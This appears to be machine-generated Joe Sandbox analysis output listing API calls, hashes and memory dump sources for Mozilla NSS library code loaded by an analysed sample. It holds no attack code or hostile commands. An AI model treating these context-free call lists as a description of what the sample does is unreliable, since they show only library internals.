                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ArenaUtil$Alloc_Grow_memcpystrlen$Errormemchrstrcmp
                                                                                                                                                                                                                          • String ID: abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_
                                                                                                                                                                                                                          • API String ID: 977052965-1032500510
                                                                                                                                                                                                                          • Opcode ID: 8fcf4c89f4c3539f350e3e80c07cbfba7a9924204774654007f4f36c7fb4c83c
                                                                                                                                                                                                                          • Instruction ID: 4c9a40202377236fb40e3c15bf405cad87d8915af0cdf4035df5ba189808f4d9
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8fcf4c89f4c3539f350e3e80c07cbfba7a9924204774654007f4f36c7fb4c83c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1461BFB9E01115ABDB10CF56CC80EABB7B5FF94359F144128DC18A7710E732E915CBA1
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C478E5B
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE007,00000000), ref: 6C478E81
                                                                                                                                                                                                                          • PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C478EED
                                                                                                                                                                                                                          • SEC_QuickDERDecodeItem_Util.NSS3(?,?,6C5A18D0,?), ref: 6C478F03
                                                                                                                                                                                                                          • PR_CallOnce.NSS3(6C5D2AA4,6C4D12D0), ref: 6C478F19
                                                                                                                                                                                                                          • PL_FreeArenaPool.NSS3(?), ref: 6C478F2B
                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C478F53
                                                                                                                                                                                                                          • memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C478F65
                                                                                                                                                                                                                          • PL_FinishArenaPool.NSS3(?), ref: 6C478FA1
                                                                                                                                                                                                                          • SECITEM_DupItem_Util.NSS3(?), ref: 6C478FFE
                                                                                                                                                                                                                          • PR_CallOnce.NSS3(6C5D2AA4,6C4D12D0), ref: 6C479012
                                                                                                                                                                                                                          • PL_FreeArenaPool.NSS3(?), ref: 6C479024
                                                                                                                                                                                                                          • PL_FinishArenaPool.NSS3(?), ref: 6C47902C
                                                                                                                                                                                                                          • PORT_DestroyCheapArena.NSS3(?), ref: 6C47903E
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Arena$Pool$Util$CallErrorFinishFreeItem_Once$Alloc_CheapDecodeDestroyInitQuickmemset
                                                                                                                                                                                                                          • String ID: security
                                                                                                                                                                                                                          • API String ID: 3512696800-3315324353
                                                                                                                                                                                                                          • Opcode ID: 4aaa50fbfab4540e4e57aff12e8bcc6132d0ffce52ec6950c5d934abbb6c676f
                                                                                                                                                                                                                          • Instruction ID: c8fbed7eed43c65583cc26e31da36e088f7770bcbdb8fad743b97afa4766209f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4aaa50fbfab4540e4e57aff12e8bcc6132d0ffce52ec6950c5d934abbb6c676f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 195138B1608340ABE720DA589C41FEB73E8AB8575DF41082EF855E7B40E771E90987B3
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6C53CC7B), ref: 6C53CD7A
                                                                                                                                                                                                                            • Part of subcall function 6C53CE60: PR_LoadLibraryWithFlags.NSS3(?,?,?,?,00000000,?,6C4AC1A8,?), ref: 6C53CE92
                                                                                                                                                                                                                          • PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C53CDA5
                                                                                                                                                                                                                          • PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C53CDB8
                                                                                                                                                                                                                          • PR_UnloadLibrary.NSS3(00000000), ref: 6C53CDDB
                                                                                                                                                                                                                          • PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C53CD8E
                                                                                                                                                                                                                            • Part of subcall function 6C4605C0: PR_EnterMonitor.NSS3 ref: 6C4605D1
                                                                                                                                                                                                                            • Part of subcall function 6C4605C0: PR_ExitMonitor.NSS3 ref: 6C4605EA
                                                                                                                                                                                                                          • PR_LoadLibrary.NSS3(wship6.dll), ref: 6C53CDE8
                                                                                                                                                                                                                          • PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C53CDFF
                                                                                                                                                                                                                          • PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C53CE16
                                                                                                                                                                                                                          • PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C53CE29
                                                                                                                                                                                                                          • PR_UnloadLibrary.NSS3(00000000), ref: 6C53CE48
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FindSymbol$Library$Load$MonitorUnload$EnterExitFlagsWith
                                                                                                                                                                                                                          • String ID: freeaddrinfo$getaddrinfo$getnameinfo$ws2_32.dll$wship6.dll
                                                                                                                                                                                                                          • API String ID: 601260978-871931242
                                                                                                                                                                                                                          • Opcode ID: fee7af10b3ca1f3041b1b21be0524b29e1fa3f382f07f1c5a2a9968e8bd200c3
• Instruction ID: 26505c588ef992026798ea1404a98cb9264095256be2de7fcd0ec53e61330f7f
• Opcode Fuzzy Hash: fee7af10b3ca1f3041b1b21be0524b29e1fa3f382f07f1c5a2a9968e8bd200c3
• Instruction Fuzzy Hash: A411A2F5E0227152D702F6BA2C00E9F3A985B0212DF185A3DF80992E41FB21E519C2EE
APIs
• calloc.MOZGLUE(00000001,00000040,?,?,?,?,?,6C5813BC,?,?,?,6C581193), ref: 6C581C6B
• PR_NewLock.NSS3(?,6C581193), ref: 6C581C7E
  • Part of subcall function 6C5398D0: calloc.MOZGLUE(00000001,00000084,6C460936,00000001,?,6C46102C), ref: 6C5398E5
• PR_NewCondVar.NSS3(00000000,?,6C581193), ref: 6C581C91
  • Part of subcall function 6C45BB80: calloc.MOZGLUE(00000001,00000084,00000000,00000040,?,6C4621BC), ref: 6C45BB8C
• PR_NewCondVar.NSS3(00000000,?,?,6C581193), ref: 6C581CA7
  • Part of subcall function 6C45BB80: PR_SetError.NSS3(FFFFE890,00000000), ref: 6C45BBEB
  • Part of subcall function 6C45BB80: InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,000005DC), ref: 6C45BBFB
  • Part of subcall function 6C45BB80: GetLastError.KERNEL32 ref: 6C45BC03
  • Part of subcall function 6C45BB80: PR_SetError.NSS3(FFFFE8AA,00000000), ref: 6C45BC19
  • Part of subcall function 6C45BB80: free.MOZGLUE(00000000), ref: 6C45BC22
• PR_NewCondVar.NSS3(00000000,?,?,?,6C581193), ref: 6C581CBE
• PR_NewCondVar.NSS3(00000000,?,?,?,?,6C581193), ref: 6C581CD4
• calloc.MOZGLUE(00000001,000000F4,?,?,?,?,?,6C581193), ref: 6C581CFE
• PR_Lock.NSS3(?,?,?,?,?,?,?,6C581193), ref: 6C581D1A
  • Part of subcall function 6C539BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6C461A48), ref: 6C539BB3
  • Part of subcall function 6C539BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6C461A48), ref: 6C539BC8
• PR_Unlock.NSS3(?,?,?,?,?,?,?,?,6C581193), ref: 6C581D3D
  • Part of subcall function 6C51DD70: TlsGetValue.KERNEL32 ref: 6C51DD8C
  • Part of subcall function 6C51DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C51DDB4
• PR_SetError.NSS3(FFFFE890,00000000,?,6C581193), ref: 6C581D4E
• PR_SetError.NSS3(FFFFE890,00000000,?,?,?,?,?,?,?,6C581193), ref: 6C581D64
• PR_DestroyCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,6C581193), ref: 6C581D6F
• PR_DestroyCondVar.NSS3(00000000,?,?,?,?,?,6C581193), ref: 6C581D7B
• PR_DestroyCondVar.NSS3(?,?,?,?,?,6C581193), ref: 6C581D87
• PR_DestroyCondVar.NSS3(00000000,?,?,?,6C581193), ref: 6C581D93
• PR_DestroyLock.NSS3(00000000,?,?,6C581193), ref: 6C581D9F
• free.MOZGLUE(00000000,?,6C581193), ref: 6C581DA8
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: Cond$DestroyError$calloc$CriticalLockSection$Valuefree$CountEnterInitializeLastLeaveSpinUnlock
• String ID:
• API String ID: 3246495057-0
• Opcode ID: cae1d66b2f0cf95c37d1efe2fe80e78f10fc9f1f8a20f2f0846192b904d1f43b
• Instruction ID: 9696cfaf0797367fd5f2697e605951775df7a1f3c55923bd30aa4441fae68481
• Opcode Fuzzy Hash: cae1d66b2f0cf95c37d1efe2fe80e78f10fc9f1f8a20f2f0846192b904d1f43b
• Instruction Fuzzy Hash: A231A6F1E017119BEB10DF25AC41E577AE4AF4165CB044838E85A87F41FB31E918CBD6
APIs
• TlsGetValue.KERNEL32 ref: 6C495ECF
• EnterCriticalSection.KERNEL32(?), ref: 6C495EE3
• PR_Unlock.NSS3(?), ref: 6C495F0A
• PK11_MakeIDFromPubKey.NSS3(00000014), ref: 6C495FB5
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: CriticalEnterFromK11_MakeSectionUnlockValue
• String ID: NSS_USE_DECODED_CKA_EC_POINT$S&Kl$S&Kl
• API String ID: 2280678669-3493570118
• Opcode ID: 9ee36f6f3421adb17eea872c6822a720a557d0ccd6e57fb83866a2d16e94dc40
• Instruction ID: b66b5fa3fdf5420d864ffc3bd8e17649cb547b83c1de77f52ed53bbac42ed9de
• Opcode Fuzzy Hash: 9ee36f6f3421adb17eea872c6822a720a557d0ccd6e57fb83866a2d16e94dc40
• Instruction Fuzzy Hash: 97F1F4B5A002158FDB44CF19C884B86BBF4FF09304F5582AADC089B746E775EA95CF91
APIs
• SECOID_GetAlgorithmTag_Util.NSS3(*,Nl), ref: 6C4E0C81
  • Part of subcall function 6C4CBE30: SECOID_FindOID_Util.NSS3(6C48311B,00000000,?,6C48311B,?), ref: 6C4CBE44
  • Part of subcall function 6C4B8500: SECOID_GetAlgorithmTag_Util.NSS3(6C4B95DC,00000000,00000000,00000000,?,6C4B95DC,00000000,00000000,?,6C497F4A,00000000,?,00000000,00000000), ref: 6C4B8517
• SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C4E0CC4
  • Part of subcall function 6C4CFAB0: free.MOZGLUE(?,-00000001,?,?,6C46F673,00000000,00000000), ref: 6C4CFAC7
• SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C4E0CD5
• PORT_ZAlloc_Util.NSS3(0000101C), ref: 6C4E0D1D
• PK11_GetBlockSize.NSS3(-00000001,00000000), ref: 6C4E0D3B
• PK11_CreateContextBySymKey.NSS3(-00000001,00000104,?,00000000), ref: 6C4E0D7D
• free.MOZGLUE(00000000), ref: 6C4E0DB5
• SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C4E0DC1
• free.MOZGLUE(00000000), ref: 6C4E0DF7
• SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C4E0E05
• PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C4E0E0F
  • Part of subcall function 6C4B95C0: SECOID_FindOIDByTag_Util.NSS3(00000000,?,00000000,?,6C497F4A,00000000,?,00000000,00000000), ref: 6C4B95E0
  • Part of subcall function 6C4B95C0: PK11_GetIVLength.NSS3(?,?,?,00000000,?,6C497F4A,00000000,?,00000000,00000000), ref: 6C4B95F5
  • Part of subcall function 6C4B95C0: SECOID_GetAlgorithmTag_Util.NSS3(00000000), ref: 6C4B9609
  • Part of subcall function 6C4B95C0: SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C4B961D
  • Part of subcall function 6C4B95C0: PK11_GetInternalSlot.NSS3 ref: 6C4B970B
  • Part of subcall function 6C4B95C0: PK11_FreeSymKey.NSS3(00000000), ref: 6C4B9756
  • Part of subcall function 6C4B95C0: PK11_GetIVLength.NSS3(?), ref: 6C4B9767
  • Part of subcall function 6C4B95C0: SECITEM_DupItem_Util.NSS3(00000000), ref: 6C4B977E
  • Part of subcall function 6C4B95C0: SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C4B978E
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: Util$K11_$Tag_$Item_$FindZfree$Algorithmfree$ContextLength$Alloc_BlockCreateDestroyFreeInternalSizeSlot
• String ID: *,Nl$*,Nl$-$Nl
• API String ID: 3136566230-2208369651
• Opcode ID: 10a9a8f5b7265a7dd45074ff60fafff3ef5e9c3c5fec30048b4b1175b9359c40
• Instruction ID: 311245155af9722638394abcdae3ef89250880e9ccdec5aab4754aa49cb646cb
• Opcode Fuzzy Hash: 10a9a8f5b7265a7dd45074ff60fafff3ef5e9c3c5fec30048b4b1175b9359c40
• Instruction Fuzzy Hash: 1141D4B5901245ABEB00DF65DC85FAF7A74EF0430AF150128ED2967741EB35EA14CBE2
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,multiaccess:,0000000C,?,00000000,?,?,6C4D5EC0,00000000,?,?), ref: 6C4D5CBE
                                                                                                                                                                                                                          • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sql:,00000004,?,?,?), ref: 6C4D5CD7
                                                                                                                                                                                                                          • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,extern:,00000007), ref: 6C4D5CF0
                                                                                                                                                                                                                          • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,dbm:,00000004), ref: 6C4D5D09
                                                                                                                                                                                                                          • PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE,?,00000000,?,?,6C4D5EC0,00000000,?,?), ref: 6C4D5D1F
                                                                                                                                                                                                                          • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000003,?), ref: 6C4D5D3C
                                                                                                                                                                                                                          • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000006,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4D5D51
                                                                                                                                                                                                                          • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000003,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4D5D66
                                                                                                                                                                                                                          • PORT_Strdup_Util.NSS3(?,?,?,?), ref: 6C4D5D80
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: strncmp$SecureStrdup_Util
                                                                                                                                                                                                                          • String ID: NSS_DEFAULT_DB_TYPE$dbm:$extern:$multiaccess:$sql:
                                                                                                                                                                                                                          • API String ID: 1171493939-3017051476
                                                                                                                                                                                                                          • Opcode ID: 29cd6a9d83e34a154c07f3d77fe00581a3ee771a033108f65bed3746360b8752
                                                                                                                                                                                                                          • Instruction ID: 931d330186d0b3dba99ce8def95e78c791b1b96b2d730fd6b643a91cf32ca69d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 29cd6a9d83e34a154c07f3d77fe00581a3ee771a033108f65bed3746360b8752
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9631D4F06413416BE701AE249C78F6637A8EF0624AF264034ED55E6B81EFB1F516C2B9
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SEC_ASN1DecodeItem_Util.NSS3(?,?,6C5A1DE0,?), ref: 6C4D6CFE
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C4D6D26
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE04F,00000000), ref: 6C4D6D70
                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(00000480), ref: 6C4D6D82
                                                                                                                                                                                                                          • DER_GetInteger_Util.NSS3(?), ref: 6C4D6DA2
                                                                                                                                                                                                                          • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C4D6DD8
                                                                                                                                                                                                                          • PK11_KeyGen.NSS3(00000000,8000000B,?,00000000,00000000), ref: 6C4D6E60
                                                                                                                                                                                                                          • PK11_CreateContextBySymKey.NSS3(00000201,00000108,?,?), ref: 6C4D6F19
                                                                                                                                                                                                                          • PK11_DigestBegin.NSS3(00000000), ref: 6C4D6F2D
                                                                                                                                                                                                                          • PK11_DigestOp.NSS3(?,?,00000000), ref: 6C4D6F7B
                                                                                                                                                                                                                          • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C4D7011
                                                                                                                                                                                                                          • PK11_FreeSymKey.NSS3(00000000), ref: 6C4D7033
                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C4D703F
                                                                                                                                                                                                                          • PK11_DigestFinal.NSS3(?,?,?,00000400), ref: 6C4D7060
                                                                                                                                                                                                                          • SECITEM_CompareItem_Util.NSS3(?,?), ref: 6C4D7087
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE062,00000000), ref: 6C4D70AF
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: K11_$Util$DigestError$ContextItem_$AlgorithmAlloc_BeginCompareCreateDecodeDestroyFinalFreeInteger_Tag_free
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2108637330-0
                                                                                                                                                                                                                          • Opcode ID: 37ed8fdd6d6512099d1e13aae8ffa969b34efffca1352d8cbc72608b1fa26218
                                                                                                                                                                                                                          • Instruction ID: df4efe1af33bba13e248f48aa5c3cab781072d19ecf1a265aa4099342d9d0e65
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 37ed8fdd6d6512099d1e13aae8ffa969b34efffca1352d8cbc72608b1fa26218
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5DA1E5715082019BEB00EE24DC65FDA32A5DB8130DF268D3DE958CBB91E775F8458793
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,?,6C47AB95,00000000,?,00000000,00000000,00000000), ref: 6C49AF25
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,6C47AB95,00000000,?,00000000,00000000,00000000), ref: 6C49AF39
                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,6C47AB95,00000000,?,00000000,00000000,00000000), ref: 6C49AF51
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE041,00000000,?,?,?,6C47AB95,00000000,?,00000000,00000000,00000000), ref: 6C49AF69
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C49B06B
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C49B083
                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C49B0A4
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C49B0C1
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(00000000), ref: 6C49B0D9
                                                                                                                                                                                                                          • PR_Unlock.NSS3 ref: 6C49B102
                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C49B151
                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C49B182
                                                                                                                                                                                                                            • Part of subcall function 6C4CFAB0: free.MOZGLUE(?,-00000001,?,?,6C46F673,00000000,00000000), ref: 6C4CFAC7
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE08A,00000000), ref: 6C49B177
                                                                                                                                                                                                                            • Part of subcall function 6C51C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C51C2BF
                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,6C47AB95,00000000,?,00000000,00000000,00000000), ref: 6C49B1A2
                                                                                                                                                                                                                          • PR_GetCurrentThread.NSS3(?,?,?,?,6C47AB95,00000000,?,00000000,00000000,00000000), ref: 6C49B1AA
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE018,00000000,?,?,?,?,6C47AB95,00000000,?,00000000,00000000,00000000), ref: 6C49B1C2
                                                                                                                                                                                                                            • Part of subcall function 6C4C1560: TlsGetValue.KERNEL32(00000000,?,6C490844,?), ref: 6C4C157A
                                                                                                                                                                                                                            • Part of subcall function 6C4C1560: EnterCriticalSection.KERNEL32(?,?,?,6C490844,?), ref: 6C4C158F
                                                                                                                                                                                                                            • Part of subcall function 6C4C1560: PR_Unlock.NSS3(?,?,?,?,6C490844,?), ref: 6C4C15B2
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Value$CriticalEnterSectionUnlock$ErrorItem_UtilZfree$CurrentThreadfree
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4188828017-0
                                                                                                                                                                                                                          • Opcode ID: c12498728b5fab4414551d046e4ad81d3e4f73a94b3337c1111753a9cd6981b4
                                                                                                                                                                                                                          • Instruction ID: 2f51752879cddfae776422cd77a4c51d43009570e87bf3bb13d2655a16902400
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c12498728b5fab4414551d046e4ad81d3e4f73a94b3337c1111753a9cd6981b4
